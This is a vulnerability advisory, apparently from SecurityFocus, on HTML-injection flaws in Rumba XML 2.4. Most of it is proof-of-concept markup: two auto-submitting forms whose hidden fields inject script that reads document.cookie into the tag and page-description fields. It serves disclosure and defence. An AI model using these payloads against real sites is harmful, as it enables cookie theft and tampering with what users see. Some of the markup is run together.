source: https://www.securityfocus.com/bid/42914/info
Rumba XML is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Rumba XML 2.4is vulnerable; other versions may also be affected.<form action="http://www.example.com/index.php" method="post" name="main"><inputtype="hidden" name="sendtags" value="cms"/><inputtype="hidden" name="sendid" value="newtag"/><inputtype="hidden" name="sendname" value='New tag"><script>alert(document.cookie)</script>' /><inputtype="hidden" name="event" value="add_tag"/></form><script>
document.main.submit();</script><form action="http://www.example.com/index.php" method="post" name="main"><inputtype="hidden" name="sendid" value="rumba_id"/><inputtype="hidden" name="sendtitl" value="rumba_titl"/><inputtype="hidden" name="sendauthor" value="rumba_author"/><inputtype="hidden" name="senddata" value="Sat, 14 Aug 2010 14:34:20"/><inputtype="hidden" name="sendlost" value="0"/><inputtype="hidden" name="senddesc" value='rumba_desc"><script>alert(document.cookie)</script>' /><inputtype="hidden" name="sendanons" value="rumba_anons"/><inputtype="hidden" name="sendtext" value="rumba_text"/><inputtype="hidden" name="sendtags" value="service"/><inputtype="hidden" name="sendcomm" value="yes"/><inputtype="hidden" name="add-end" value="begin"/><inputtype="hidden" name="send_old_id" value="rumba_old_id"/><inputtype="hidden" name="event" value="add_page"/></form><script>
document.main.submit();</script>